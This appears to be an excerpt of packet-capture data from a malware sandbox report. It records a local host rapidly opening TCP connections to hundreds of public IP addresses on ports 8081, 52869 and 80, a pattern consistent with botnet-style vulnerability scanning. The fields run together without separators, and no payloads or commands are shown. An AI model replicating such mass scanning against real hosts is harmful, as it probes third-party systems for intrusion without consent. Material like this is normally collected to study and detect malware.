                                                Jul 20, 2024 23:05:34.759711027 CEST354228081192.168.2.14206.200.85.218
                                                Jul 20, 2024 23:05:34.760564089 CEST808126710218.19.83.22192.168.2.14
                                                Jul 20, 2024 23:05:34.760979891 CEST267108081192.168.2.14142.158.242.86
                                                Jul 20, 2024 23:05:34.760979891 CEST267108081192.168.2.1437.206.71.23
                                                Jul 20, 2024 23:05:34.761343956 CEST267108081192.168.2.1423.31.163.183
                                                Jul 20, 2024 23:05:34.761343956 CEST267108081192.168.2.14184.63.103.178
                                                Jul 20, 2024 23:05:34.761343956 CEST267108081192.168.2.1459.96.211.72
                                                Jul 20, 2024 23:05:34.761343956 CEST267108081192.168.2.14122.35.207.128
                                                Jul 20, 2024 23:05:34.761343956 CEST267108081192.168.2.14173.0.58.136
                                                Jul 20, 2024 23:05:34.762365103 CEST5250480192.168.2.14112.246.238.137
                                                Jul 20, 2024 23:05:34.762892962 CEST267108081192.168.2.1457.168.210.38
                                                Jul 20, 2024 23:05:34.762892962 CEST267108081192.168.2.14159.159.121.84
                                                Jul 20, 2024 23:05:34.762892962 CEST267108081192.168.2.14212.163.30.143
                                                Jul 20, 2024 23:05:34.762892962 CEST267108081192.168.2.14115.109.195.46
                                                Jul 20, 2024 23:05:34.762892962 CEST267108081192.168.2.14106.1.198.107
                                                Jul 20, 2024 23:05:34.762892962 CEST267108081192.168.2.1485.129.198.66
                                                Jul 20, 2024 23:05:34.762892962 CEST267108081192.168.2.1412.42.23.14
                                                Jul 20, 2024 23:05:34.762892962 CEST267108081192.168.2.14102.67.96.153
                                                Jul 20, 2024 23:05:34.763227940 CEST267108081192.168.2.1478.38.34.251
                                                Jul 20, 2024 23:05:34.763227940 CEST267108081192.168.2.14111.118.134.71
                                                Jul 20, 2024 23:05:34.763227940 CEST267108081192.168.2.1467.169.66.19
                                                Jul 20, 2024 23:05:34.763227940 CEST267108081192.168.2.14155.45.229.21
                                                Jul 20, 2024 23:05:34.763227940 CEST267108081192.168.2.14195.161.199.55
                                                Jul 20, 2024 23:05:34.763227940 CEST267108081192.168.2.1437.12.16.92
                                                Jul 20, 2024 23:05:34.763227940 CEST267108081192.168.2.1453.39.109.88
                                                Jul 20, 2024 23:05:34.763227940 CEST267108081192.168.2.1490.123.233.74
                                                Jul 20, 2024 23:05:34.763955116 CEST267108081192.168.2.1442.208.31.223
                                                Jul 20, 2024 23:05:34.763955116 CEST267108081192.168.2.14133.167.76.30
                                                Jul 20, 2024 23:05:34.763955116 CEST267108081192.168.2.14150.51.41.160
                                                Jul 20, 2024 23:05:34.763955116 CEST267108081192.168.2.1490.19.97.62
                                                Jul 20, 2024 23:05:34.763955116 CEST267108081192.168.2.14154.240.218.212
                                                Jul 20, 2024 23:05:34.763955116 CEST267108081192.168.2.14213.166.141.239
                                                Jul 20, 2024 23:05:34.763955116 CEST267108081192.168.2.14173.213.205.133
                                                Jul 20, 2024 23:05:34.763955116 CEST267108081192.168.2.14195.5.148.57
                                                Jul 20, 2024 23:05:34.764931917 CEST267108081192.168.2.1488.78.214.117
                                                Jul 20, 2024 23:05:34.764933109 CEST267108081192.168.2.14195.91.11.214
                                                Jul 20, 2024 23:05:34.764933109 CEST267108081192.168.2.14218.19.83.22
                                                Jul 20, 2024 23:05:34.765135050 CEST596788081192.168.2.14218.176.173.120
                                                Jul 20, 2024 23:05:34.765135050 CEST596788081192.168.2.14218.176.173.120
                                                Jul 20, 2024 23:05:34.765525103 CEST3864452869192.168.2.1420.40.190.208
                                                Jul 20, 2024 23:05:34.765525103 CEST406268081192.168.2.14175.213.86.159
                                                Jul 20, 2024 23:05:34.765525103 CEST4799052869192.168.2.14179.21.144.79
                                                Jul 20, 2024 23:05:34.765852928 CEST267108081192.168.2.1459.134.153.172
                                                Jul 20, 2024 23:05:34.765852928 CEST396128081192.168.2.14175.213.86.159
                                                Jul 20, 2024 23:05:34.765852928 CEST396128081192.168.2.14175.213.86.159
                                                Jul 20, 2024 23:05:34.765919924 CEST808135422206.200.85.218192.168.2.14
                                                Jul 20, 2024 23:05:34.765966892 CEST354228081192.168.2.14206.200.85.218
                                                Jul 20, 2024 23:05:34.766674995 CEST606908081192.168.2.14218.176.173.120
                                                Jul 20, 2024 23:05:34.767381907 CEST3371452869192.168.2.14170.98.124.78
                                                Jul 20, 2024 23:05:34.767491102 CEST8052504112.246.238.137192.168.2.14
                                                Jul 20, 2024 23:05:34.767549992 CEST5250480192.168.2.14112.246.238.137
                                                Jul 20, 2024 23:05:34.768142939 CEST3943480192.168.2.14112.25.61.41
                                                Jul 20, 2024 23:05:34.768456936 CEST576408081192.168.2.14216.94.19.185
                                                Jul 20, 2024 23:05:34.768456936 CEST576408081192.168.2.14216.94.19.185
                                                Jul 20, 2024 23:05:34.769346952 CEST586508081192.168.2.14216.94.19.185
                                                Jul 20, 2024 23:05:34.770427942 CEST808159678218.176.173.120192.168.2.14
                                                Jul 20, 2024 23:05:34.770493984 CEST4269652869192.168.2.1446.103.116.159
                                                Jul 20, 2024 23:05:34.770522118 CEST528693864420.40.190.208192.168.2.14
                                                Jul 20, 2024 23:05:34.770689964 CEST3864452869192.168.2.1420.40.190.208
                                                Jul 20, 2024 23:05:34.770813942 CEST374568081192.168.2.14165.244.247.227
                                                Jul 20, 2024 23:05:34.770814896 CEST374568081192.168.2.14165.244.247.227
                                                Jul 20, 2024 23:05:34.770843983 CEST808140626175.213.86.159192.168.2.14
                                                Jul 20, 2024 23:05:34.770929098 CEST406268081192.168.2.14175.213.86.159
                                                Jul 20, 2024 23:05:34.770944118 CEST5286947990179.21.144.79192.168.2.14
                                                Jul 20, 2024 23:05:34.771047115 CEST4799052869192.168.2.14179.21.144.79
                                                Jul 20, 2024 23:05:34.771209955 CEST808139612175.213.86.159192.168.2.14
                                                Jul 20, 2024 23:05:34.771894932 CEST384628081192.168.2.14165.244.247.227
                                                Jul 20, 2024 23:05:34.772217035 CEST808160690218.176.173.120192.168.2.14
                                                Jul 20, 2024 23:05:34.772265911 CEST606908081192.168.2.14218.176.173.120
                                                Jul 20, 2024 23:05:34.772373915 CEST4773652869192.168.2.1437.154.117.198
                                                Jul 20, 2024 23:05:34.772468090 CEST5286933714170.98.124.78192.168.2.14
                                                Jul 20, 2024 23:05:34.772528887 CEST3371452869192.168.2.14170.98.124.78
                                                Jul 20, 2024 23:05:34.772842884 CEST5872480192.168.2.14112.49.218.111
                                                Jul 20, 2024 23:05:34.773179054 CEST343348081192.168.2.1452.244.143.64
                                                Jul 20, 2024 23:05:34.773179054 CEST343348081192.168.2.1452.244.143.64
                                                Jul 20, 2024 23:05:34.773191929 CEST8039434112.25.61.41192.168.2.14
                                                Jul 20, 2024 23:05:34.773309946 CEST3943480192.168.2.14112.25.61.41
                                                Jul 20, 2024 23:05:34.773458004 CEST808157640216.94.19.185192.168.2.14
                                                Jul 20, 2024 23:05:34.774013042 CEST353388081192.168.2.1452.244.143.64
                                                Jul 20, 2024 23:05:34.774306059 CEST808158650216.94.19.185192.168.2.14
                                                Jul 20, 2024 23:05:34.774400949 CEST586508081192.168.2.14216.94.19.185
                                                Jul 20, 2024 23:05:34.775006056 CEST3512052869192.168.2.14162.47.82.104
                                                Jul 20, 2024 23:05:34.775315046 CEST504408081192.168.2.14194.241.217.231
                                                Jul 20, 2024 23:05:34.775315046 CEST504408081192.168.2.14194.241.217.231
                                                Jul 20, 2024 23:05:34.775477886 CEST528694269646.103.116.159192.168.2.14
                                                Jul 20, 2024 23:05:34.775525093 CEST4269652869192.168.2.1446.103.116.159
                                                Jul 20, 2024 23:05:34.775795937 CEST808137456165.244.247.227192.168.2.14
                                                Jul 20, 2024 23:05:34.776478052 CEST514408081192.168.2.14194.241.217.231
                                                Jul 20, 2024 23:05:34.777173996 CEST4632252869192.168.2.1434.247.156.202
                                                Jul 20, 2024 23:05:34.777503014 CEST808138462165.244.247.227192.168.2.14
                                                Jul 20, 2024 23:05:34.777575970 CEST3924880192.168.2.14112.43.220.136
                                                Jul 20, 2024 23:05:34.777597904 CEST384628081192.168.2.14165.244.247.227
                                                Jul 20, 2024 23:05:34.777740002 CEST528694773637.154.117.198192.168.2.14
                                                Jul 20, 2024 23:05:34.777815104 CEST4773652869192.168.2.1437.154.117.198
                                                Jul 20, 2024 23:05:34.777904987 CEST586528081192.168.2.14124.192.22.110
                                                Jul 20, 2024 23:05:34.777904987 CEST586528081192.168.2.14124.192.22.110
                                                Jul 20, 2024 23:05:34.777905941 CEST8058724112.49.218.111192.168.2.14
                                                Jul 20, 2024 23:05:34.777952909 CEST5872480192.168.2.14112.49.218.111
                                                Jul 20, 2024 23:05:34.778409004 CEST80813433452.244.143.64192.168.2.14
                                                Jul 20, 2024 23:05:34.778675079 CEST596508081192.168.2.14124.192.22.110
                                                Jul 20, 2024 23:05:34.779092073 CEST80813533852.244.143.64192.168.2.14
                                                Jul 20, 2024 23:05:34.779186010 CEST353388081192.168.2.1452.244.143.64
                                                Jul 20, 2024 23:05:34.779689074 CEST5433852869192.168.2.1441.152.208.190
                                                Jul 20, 2024 23:05:34.780164957 CEST5286935120162.47.82.104192.168.2.14
                                                Jul 20, 2024 23:05:34.780239105 CEST3512052869192.168.2.14162.47.82.104
                                                Jul 20, 2024 23:05:34.780241966 CEST420148081192.168.2.14134.119.253.236
                                                Jul 20, 2024 23:05:34.780241966 CEST420148081192.168.2.14134.119.253.236
                                                Jul 20, 2024 23:05:34.780371904 CEST808150440194.241.217.231192.168.2.14
                                                Jul 20, 2024 23:05:34.781538010 CEST808151440194.241.217.231192.168.2.14
                                                Jul 20, 2024 23:05:34.781578064 CEST430088081192.168.2.14134.119.253.236
                                                Jul 20, 2024 23:05:34.781598091 CEST514408081192.168.2.14194.241.217.231
                                                Jul 20, 2024 23:05:34.782114029 CEST4328452869192.168.2.14223.210.25.241
                                                Jul 20, 2024 23:05:34.782869101 CEST5616480192.168.2.14112.227.160.90
                                                Jul 20, 2024 23:05:34.782968998 CEST528694632234.247.156.202192.168.2.14
                                                Jul 20, 2024 23:05:34.783015966 CEST4632252869192.168.2.1434.247.156.202
                                                Jul 20, 2024 23:05:34.783159971 CEST8039248112.43.220.136192.168.2.14
                                                Jul 20, 2024 23:05:34.783207893 CEST3924880192.168.2.14112.43.220.136
                                                Jul 20, 2024 23:05:34.783258915 CEST585308081192.168.2.1462.126.175.165
                                                Jul 20, 2024 23:05:34.783258915 CEST585308081192.168.2.1462.126.175.165
                                                Jul 20, 2024 23:05:34.784073114 CEST808158652124.192.22.110192.168.2.14
                                                Jul 20, 2024 23:05:34.784096956 CEST595228081192.168.2.1462.126.175.165
                                                Jul 20, 2024 23:05:34.785147905 CEST3362052869192.168.2.14136.195.130.35
                                                Jul 20, 2024 23:05:34.785469055 CEST543708081192.168.2.14198.22.36.136
                                                Jul 20, 2024 23:05:34.785469055 CEST543708081192.168.2.14198.22.36.136
                                                Jul 20, 2024 23:05:34.786365032 CEST808159650124.192.22.110192.168.2.14
                                                Jul 20, 2024 23:05:34.786437035 CEST528695433841.152.208.190192.168.2.14
                                                Jul 20, 2024 23:05:34.786472082 CEST808142014134.119.253.236192.168.2.14
                                                Jul 20, 2024 23:05:34.786487103 CEST5433852869192.168.2.1441.152.208.190
                                                Jul 20, 2024 23:05:34.786550045 CEST596508081192.168.2.14124.192.22.110
                                                Jul 20, 2024 23:05:34.786550999 CEST808143008134.119.253.236192.168.2.14
                                                Jul 20, 2024 23:05:34.786621094 CEST430088081192.168.2.14134.119.253.236
                                                Jul 20, 2024 23:05:34.786811113 CEST553588081192.168.2.14198.22.36.136
                                                Jul 20, 2024 23:05:34.787405968 CEST6052852869192.168.2.14118.75.62.14
                                                Jul 20, 2024 23:05:34.787486076 CEST5286943284223.210.25.241192.168.2.14
                                                Jul 20, 2024 23:05:34.787545919 CEST4328452869192.168.2.14223.210.25.241
                                                Jul 20, 2024 23:05:34.787952900 CEST6075280192.168.2.14112.175.149.74
                                                Jul 20, 2024 23:05:34.788263083 CEST396268081192.168.2.1486.35.5.8
                                                Jul 20, 2024 23:05:34.788263083 CEST396268081192.168.2.1486.35.5.8
                                                Jul 20, 2024 23:05:34.788628101 CEST8056164112.227.160.90192.168.2.14
                                                Jul 20, 2024 23:05:34.788731098 CEST80815853062.126.175.165192.168.2.14
                                                Jul 20, 2024 23:05:34.788742065 CEST5616480192.168.2.14112.227.160.90
                                                Jul 20, 2024 23:05:34.789278030 CEST406128081192.168.2.1486.35.5.8
                                                Jul 20, 2024 23:05:34.789323092 CEST80815952262.126.175.165192.168.2.14
                                                Jul 20, 2024 23:05:34.789356947 CEST595228081192.168.2.1462.126.175.165
                                                Jul 20, 2024 23:05:34.790220022 CEST3425452869192.168.2.1417.92.216.196
                                                Jul 20, 2024 23:05:34.790738106 CEST365948081192.168.2.1417.7.135.117
                                                Jul 20, 2024 23:05:34.790738106 CEST365948081192.168.2.1417.7.135.117
                                                Jul 20, 2024 23:05:34.790992022 CEST5286933620136.195.130.35192.168.2.14
                                                Jul 20, 2024 23:05:34.790997982 CEST808154370198.22.36.136192.168.2.14
                                                Jul 20, 2024 23:05:34.791054010 CEST3362052869192.168.2.14136.195.130.35
                                                Jul 20, 2024 23:05:34.791977882 CEST375768081192.168.2.1417.7.135.117
                                                Jul 20, 2024 23:05:34.792546034 CEST808155358198.22.36.136192.168.2.14
                                                Jul 20, 2024 23:05:34.792591095 CEST553588081192.168.2.14198.22.36.136
                                                Jul 20, 2024 23:05:34.792633057 CEST5677852869192.168.2.1478.129.211.10
                                                Jul 20, 2024 23:05:34.792663097 CEST5286960528118.75.62.14192.168.2.14
                                                Jul 20, 2024 23:05:34.792732000 CEST6052852869192.168.2.14118.75.62.14
                                                Jul 20, 2024 23:05:34.793010950 CEST8060752112.175.149.74192.168.2.14
                                                Jul 20, 2024 23:05:34.793065071 CEST6075280192.168.2.14112.175.149.74
                                                Jul 20, 2024 23:05:34.793071032 CEST5672080192.168.2.14112.11.123.223
                                                Jul 20, 2024 23:05:34.793101072 CEST80813962686.35.5.8192.168.2.14
                                                Jul 20, 2024 23:05:34.793334007 CEST597628081192.168.2.1485.73.99.232
                                                Jul 20, 2024 23:05:34.793334007 CEST597628081192.168.2.1485.73.99.232
                                                Jul 20, 2024 23:05:34.794176102 CEST607428081192.168.2.1485.73.99.232
                                                Jul 20, 2024 23:05:34.795243025 CEST3840852869192.168.2.148.166.54.209
                                                Jul 20, 2024 23:05:34.795526028 CEST472868081192.168.2.14151.153.104.167
                                                Jul 20, 2024 23:05:34.795526028 CEST472868081192.168.2.14151.153.104.167
                                                Jul 20, 2024 23:05:34.795896053 CEST80814061286.35.5.8192.168.2.14
                                                Jul 20, 2024 23:05:34.795950890 CEST406128081192.168.2.1486.35.5.8
                                                Jul 20, 2024 23:05:34.795957088 CEST528693425417.92.216.196192.168.2.14
                                                Jul 20, 2024 23:05:34.795963049 CEST80813659417.7.135.117192.168.2.14
                                                Jul 20, 2024 23:05:34.796005011 CEST3425452869192.168.2.1417.92.216.196
                                                Jul 20, 2024 23:05:34.797092915 CEST808134406206.200.85.218192.168.2.14
                                                Jul 20, 2024 23:05:34.797111988 CEST80813757617.7.135.117192.168.2.14
                                                Jul 20, 2024 23:05:34.797151089 CEST482648081192.168.2.14151.153.104.167
                                                Jul 20, 2024 23:05:34.797154903 CEST375768081192.168.2.1417.7.135.117
                                                Jul 20, 2024 23:05:34.797799110 CEST5781252869192.168.2.1444.6.194.12
                                                Jul 20, 2024 23:05:34.798120975 CEST528695677878.129.211.10192.168.2.14
                                                Jul 20, 2024 23:05:34.798176050 CEST5677852869192.168.2.1478.129.211.10
                                                Jul 20, 2024 23:05:34.798238039 CEST4251880192.168.2.14112.226.121.157
                                                Jul 20, 2024 23:05:34.798420906 CEST8056720112.11.123.223192.168.2.14
                                                Jul 20, 2024 23:05:34.798461914 CEST5672080192.168.2.14112.11.123.223
                                                Jul 20, 2024 23:05:34.798485041 CEST80815976285.73.99.232192.168.2.14
                                                Jul 20, 2024 23:05:34.798557043 CEST451108081192.168.2.14213.31.81.52
                                                Jul 20, 2024 23:05:34.798557043 CEST451108081192.168.2.14213.31.81.52
                                                Jul 20, 2024 23:05:34.799365997 CEST460868081192.168.2.14213.31.81.52
                                                Jul 20, 2024 23:05:34.799639940 CEST80816074285.73.99.232192.168.2.14
                                                Jul 20, 2024 23:05:34.799688101 CEST607428081192.168.2.1485.73.99.232
                                                Jul 20, 2024 23:05:34.800343990 CEST52869384088.166.54.209192.168.2.14
                                                Jul 20, 2024 23:05:34.800477028 CEST3840852869192.168.2.148.166.54.209
                                                Jul 20, 2024 23:05:34.800668955 CEST4148652869192.168.2.14199.49.205.148
                                                Jul 20, 2024 23:05:34.800694942 CEST808147286151.153.104.167192.168.2.14
                                                Jul 20, 2024 23:05:34.800981998 CEST567688081192.168.2.14196.214.28.4
                                                Jul 20, 2024 23:05:34.800981998 CEST567688081192.168.2.14196.214.28.4
                                                Jul 20, 2024 23:05:34.802521944 CEST808148264151.153.104.167192.168.2.14
                                                Jul 20, 2024 23:05:34.802603960 CEST482648081192.168.2.14151.153.104.167
                                                Jul 20, 2024 23:05:34.802961111 CEST577408081192.168.2.14196.214.28.4
                                                Jul 20, 2024 23:05:34.802973032 CEST528695781244.6.194.12192.168.2.14
                                                Jul 20, 2024 23:05:34.803014994 CEST5781252869192.168.2.1444.6.194.12
                                                Jul 20, 2024 23:05:34.803333998 CEST8042518112.226.121.157192.168.2.14
                                                Jul 20, 2024 23:05:34.803432941 CEST808145110213.31.81.52192.168.2.14
                                                Jul 20, 2024 23:05:34.803457022 CEST4251880192.168.2.14112.226.121.157
                                                Jul 20, 2024 23:05:34.803550959 CEST5571852869192.168.2.14113.47.213.157
                                                Jul 20, 2024 23:05:34.804508924 CEST5291080192.168.2.14112.169.232.30
                                                Jul 20, 2024 23:05:34.804833889 CEST808146086213.31.81.52192.168.2.14
                                                Jul 20, 2024 23:05:34.804872990 CEST455928081192.168.2.14213.125.79.161
                                                Jul 20, 2024 23:05:34.804872990 CEST455928081192.168.2.14213.125.79.161
                                                Jul 20, 2024 23:05:34.804892063 CEST460868081192.168.2.14213.31.81.52
                                                Jul 20, 2024 23:05:34.805835009 CEST465608081192.168.2.14213.125.79.161
                                                Jul 20, 2024 23:05:34.805912971 CEST5286941486199.49.205.148192.168.2.14
                                                Jul 20, 2024 23:05:34.805963993 CEST4148652869192.168.2.14199.49.205.148
                                                Jul 20, 2024 23:05:34.806071997 CEST808156768196.214.28.4192.168.2.14
                                                Jul 20, 2024 23:05:34.807209015 CEST4320652869192.168.2.1465.155.38.231
                                                Jul 20, 2024 23:05:34.807699919 CEST345908081192.168.2.14141.238.111.1
                                                Jul 20, 2024 23:05:34.807699919 CEST345908081192.168.2.14141.238.111.1
                                                Jul 20, 2024 23:05:34.807929039 CEST808157740196.214.28.4192.168.2.14
                                                Jul 20, 2024 23:05:34.807990074 CEST577408081192.168.2.14196.214.28.4
                                                Jul 20, 2024 23:05:34.808734894 CEST5286955718113.47.213.157192.168.2.14
                                                Jul 20, 2024 23:05:34.808773041 CEST5571852869192.168.2.14113.47.213.157
                                                Jul 20, 2024 23:05:34.808964968 CEST355448081192.168.2.14141.238.111.1
                                                Jul 20, 2024 23:05:34.809626102 CEST4130652869192.168.2.14112.153.191.145
                                                Jul 20, 2024 23:05:34.809633017 CEST8052910112.169.232.30192.168.2.14
                                                Jul 20, 2024 23:05:34.809720993 CEST5291080192.168.2.14112.169.232.30
                                                Jul 20, 2024 23:05:34.809948921 CEST808145592213.125.79.161192.168.2.14
                                                Jul 20, 2024 23:05:34.810074091 CEST3922280192.168.2.14112.157.148.140
                                                Jul 20, 2024 23:05:34.810363054 CEST416388081192.168.2.1481.72.49.108
                                                Jul 20, 2024 23:05:34.810363054 CEST416388081192.168.2.1481.72.49.108
                                                Jul 20, 2024 23:05:34.811029911 CEST808146560213.125.79.161192.168.2.14
                                                Jul 20, 2024 23:05:34.811081886 CEST465608081192.168.2.14213.125.79.161
                                                Jul 20, 2024 23:05:34.811172009 CEST425888081192.168.2.1481.72.49.108
                                                Jul 20, 2024 23:05:34.812447071 CEST6027252869192.168.2.14106.240.191.91
                                                Jul 20, 2024 23:05:34.812674046 CEST528694320665.155.38.231192.168.2.14
                                                Jul 20, 2024 23:05:34.812717915 CEST4320652869192.168.2.1465.155.38.231
                                                Jul 20, 2024 23:05:34.812797070 CEST808134590141.238.111.1192.168.2.14
                                                Jul 20, 2024 23:05:34.812815905 CEST603188081192.168.2.1457.96.182.14
                                                Jul 20, 2024 23:05:34.812815905 CEST603188081192.168.2.1457.96.182.14
                                                Jul 20, 2024 23:05:34.813139915 CEST808139612175.213.86.159192.168.2.14
                                                Jul 20, 2024 23:05:34.813186884 CEST808159678218.176.173.120192.168.2.14
                                                Jul 20, 2024 23:05:34.814033985 CEST808135544141.238.111.1192.168.2.14
                                                Jul 20, 2024 23:05:34.814080954 CEST355448081192.168.2.14141.238.111.1
                                                Jul 20, 2024 23:05:34.814229965 CEST330328081192.168.2.1457.96.182.14
                                                Jul 20, 2024 23:05:34.814730883 CEST3365252869192.168.2.1479.15.211.18
                                                Jul 20, 2024 23:05:34.814781904 CEST5286941306112.153.191.145192.168.2.14
                                                Jul 20, 2024 23:05:34.814847946 CEST4130652869192.168.2.14112.153.191.145
                                                Jul 20, 2024 23:05:34.815150976 CEST5379680192.168.2.14112.104.0.150
                                                Jul 20, 2024 23:05:34.815258980 CEST8039222112.157.148.140192.168.2.14
                                                Jul 20, 2024 23:05:34.815323114 CEST3922280192.168.2.14112.157.148.140
                                                Jul 20, 2024 23:05:34.815541029 CEST364088081192.168.2.14139.69.41.174
                                                Jul 20, 2024 23:05:34.815541029 CEST364088081192.168.2.14139.69.41.174
                                                Jul 20, 2024 23:05:34.815557003 CEST80814163881.72.49.108192.168.2.14
                                                Jul 20, 2024 23:05:34.816570044 CEST373528081192.168.2.14139.69.41.174
                                                Jul 20, 2024 23:05:34.816705942 CEST80814258881.72.49.108192.168.2.14
                                                Jul 20, 2024 23:05:34.816895008 CEST425888081192.168.2.1481.72.49.108
                                                Jul 20, 2024 23:05:34.817450047 CEST5286960272106.240.191.91192.168.2.14
                                                Jul 20, 2024 23:05:34.817495108 CEST6027252869192.168.2.14106.240.191.91
                                                Jul 20, 2024 23:05:34.817962885 CEST4629652869192.168.2.14216.11.155.229
                                                Jul 20, 2024 23:05:34.818058014 CEST80816031857.96.182.14192.168.2.14
                                                Jul 20, 2024 23:05:34.818290949 CEST496148081192.168.2.14190.19.12.161
                                                Jul 20, 2024 23:05:34.818290949 CEST496148081192.168.2.14190.19.12.161
                                                Jul 20, 2024 23:05:34.818793058 CEST485648081192.168.2.14196.209.5.151
                                                Jul 20, 2024 23:05:34.819425106 CEST80813303257.96.182.14192.168.2.14
                                                Jul 20, 2024 23:05:34.819472075 CEST330328081192.168.2.1457.96.182.14
                                                Jul 20, 2024 23:05:34.819711924 CEST528693365279.15.211.18192.168.2.14
                                                Jul 20, 2024 23:05:34.819849968 CEST3365252869192.168.2.1479.15.211.18
                                                Jul 20, 2024 23:05:34.820096970 CEST505568081192.168.2.14190.19.12.161
                                                Jul 20, 2024 23:05:34.820143938 CEST8053796112.104.0.150192.168.2.14
                                                Jul 20, 2024 23:05:34.820175886 CEST5379680192.168.2.14112.104.0.150
                                                Jul 20, 2024 23:05:34.820409060 CEST808136408139.69.41.174192.168.2.14
                                                Jul 20, 2024 23:05:34.820771933 CEST4106852869192.168.2.1489.77.15.240
                                                Jul 20, 2024 23:05:34.820997953 CEST808137456165.244.247.227192.168.2.14
                                                Jul 20, 2024 23:05:34.821002960 CEST808157640216.94.19.185192.168.2.14
                                                Jul 20, 2024 23:05:34.821007967 CEST808150440194.241.217.231192.168.2.14
                                                Jul 20, 2024 23:05:34.821058035 CEST80813433452.244.143.64192.168.2.14
                                                Jul 20, 2024 23:05:34.821329117 CEST5217280192.168.2.14112.73.11.34
                                                Jul 20, 2024 23:05:34.821810007 CEST494268081192.168.2.14203.122.70.32
                                                Jul 20, 2024 23:05:34.821810007 CEST494268081192.168.2.14203.122.70.32
                                                Jul 20, 2024 23:05:34.822036982 CEST808137352139.69.41.174192.168.2.14
                                                Jul 20, 2024 23:05:34.822114944 CEST373528081192.168.2.14139.69.41.174
                                                Jul 20, 2024 23:05:34.822724104 CEST503668081192.168.2.14203.122.70.32
                                                Jul 20, 2024 23:05:34.823389053 CEST5286946296216.11.155.229192.168.2.14
                                                Jul 20, 2024 23:05:34.823429108 CEST4629652869192.168.2.14216.11.155.229
                                                Jul 20, 2024 23:05:34.823550940 CEST808149614190.19.12.161192.168.2.14
                                                Jul 20, 2024 23:05:34.823604107 CEST5306052869192.168.2.14134.144.46.130
                                                Jul 20, 2024 23:05:34.823962927 CEST365548081192.168.2.14142.57.242.144
                                                Jul 20, 2024 23:05:34.823962927 CEST365548081192.168.2.14142.57.242.144
                                                Jul 20, 2024 23:05:34.824500084 CEST808148564196.209.5.151192.168.2.14
                                                Jul 20, 2024 23:05:34.824547052 CEST485648081192.168.2.14196.209.5.151
                                                Jul 20, 2024 23:05:34.825340033 CEST374908081192.168.2.14142.57.242.144
                                                Jul 20, 2024 23:05:34.825447083 CEST808150556190.19.12.161192.168.2.14
                                                Jul 20, 2024 23:05:34.825568914 CEST505568081192.168.2.14190.19.12.161
                                                Jul 20, 2024 23:05:34.825835943 CEST528694106889.77.15.240192.168.2.14
                                                Jul 20, 2024 23:05:34.825900078 CEST4106852869192.168.2.1489.77.15.240
                                                Jul 20, 2024 23:05:34.825941086 CEST4120052869192.168.2.14140.198.134.198
                                                Jul 20, 2024 23:05:34.826390982 CEST4823880192.168.2.14112.201.236.92
                                                Jul 20, 2024 23:05:34.826644897 CEST518148081192.168.2.14148.208.115.237
                                                Jul 20, 2024 23:05:34.826644897 CEST518148081192.168.2.14148.208.115.237
                                                Jul 20, 2024 23:05:34.827001095 CEST8052172112.73.11.34192.168.2.14
                                                Jul 20, 2024 23:05:34.827054024 CEST5217280192.168.2.14112.73.11.34
                                                Jul 20, 2024 23:05:34.827105999 CEST808149426203.122.70.32192.168.2.14
                                                Jul 20, 2024 23:05:34.827421904 CEST527468081192.168.2.14148.208.115.237
                                                Jul 20, 2024 23:05:34.827737093 CEST808150366203.122.70.32192.168.2.14
                                                Jul 20, 2024 23:05:34.827770948 CEST503668081192.168.2.14203.122.70.32
                                                Jul 20, 2024 23:05:34.828298092 CEST5383652869192.168.2.14115.97.137.57
                                                Jul 20, 2024 23:05:34.828566074 CEST591748081192.168.2.14112.156.163.183
                                                Jul 20, 2024 23:05:34.828566074 CEST591748081192.168.2.14112.156.163.183
                                                Jul 20, 2024 23:05:34.829107046 CEST808158652124.192.22.110192.168.2.14
                                                Jul 20, 2024 23:05:34.829112053 CEST80815853062.126.175.165192.168.2.14
                                                Jul 20, 2024 23:05:34.829122066 CEST808142014134.119.253.236192.168.2.14
                                                Jul 20, 2024 23:05:34.829200983 CEST5286953060134.144.46.130192.168.2.14
                                                Jul 20, 2024 23:05:34.829205990 CEST808136554142.57.242.144192.168.2.14
                                                Jul 20, 2024 23:05:34.829246044 CEST5306052869192.168.2.14134.144.46.130
                                                Jul 20, 2024 23:05:34.830044985 CEST601028081192.168.2.14112.156.163.183
                                                Jul 20, 2024 23:05:34.830555916 CEST808137490142.57.242.144192.168.2.14
                                                Jul 20, 2024 23:05:34.830595016 CEST374908081192.168.2.14142.57.242.144
                                                Jul 20, 2024 23:05:34.830607891 CEST5163652869192.168.2.14212.202.97.136
                                                Jul 20, 2024 23:05:34.831089973 CEST3918880192.168.2.14112.169.29.19
                                                Jul 20, 2024 23:05:34.831456900 CEST5286941200140.198.134.198192.168.2.14
                                                Jul 20, 2024 23:05:34.831507921 CEST4120052869192.168.2.14140.198.134.198
                                                Jul 20, 2024 23:05:34.831543922 CEST582548081192.168.2.14147.99.2.34
                                                Jul 20, 2024 23:05:34.831543922 CEST582548081192.168.2.14147.99.2.34
                                                Jul 20, 2024 23:05:34.831733942 CEST8048238112.201.236.92192.168.2.14
                                                Jul 20, 2024 23:05:34.831795931 CEST4823880192.168.2.14112.201.236.92
                                                Jul 20, 2024 23:05:34.831942081 CEST808151814148.208.115.237192.168.2.14
                                                Jul 20, 2024 23:05:34.832413912 CEST591788081192.168.2.14147.99.2.34
                                                Jul 20, 2024 23:05:34.832592010 CEST808152746148.208.115.237192.168.2.14
                                                Jul 20, 2024 23:05:34.832637072 CEST527468081192.168.2.14148.208.115.237
                                                Jul 20, 2024 23:05:34.833060980 CEST808154370198.22.36.136192.168.2.14
                                                Jul 20, 2024 23:05:34.833522081 CEST5286953836115.97.137.57192.168.2.14
                                                Jul 20, 2024 23:05:34.833537102 CEST5419852869192.168.2.14107.117.108.202
                                                Jul 20, 2024 23:05:34.833564997 CEST5383652869192.168.2.14115.97.137.57
                                                Jul 20, 2024 23:05:34.833565950 CEST808159174112.156.163.183192.168.2.14
                                                Jul 20, 2024 23:05:34.833869934 CEST534928081192.168.2.1414.35.198.9
                                                Jul 20, 2024 23:05:34.833869934 CEST534928081192.168.2.1414.35.198.9
                                                Jul 20, 2024 23:05:34.835212946 CEST808160102112.156.163.183192.168.2.14
                                                Jul 20, 2024 23:05:34.835267067 CEST544088081192.168.2.1414.35.198.9
                                                Jul 20, 2024 23:05:34.835282087 CEST601028081192.168.2.14112.156.163.183
                                                Jul 20, 2024 23:05:34.835900068 CEST3807452869192.168.2.1425.145.229.184
                                                Jul 20, 2024 23:05:34.836684942 CEST4753280192.168.2.14112.7.137.162
                                                Jul 20, 2024 23:05:34.837037086 CEST388368081192.168.2.1427.100.98.197
                                                Jul 20, 2024 23:05:34.837037086 CEST388368081192.168.2.1427.100.98.197
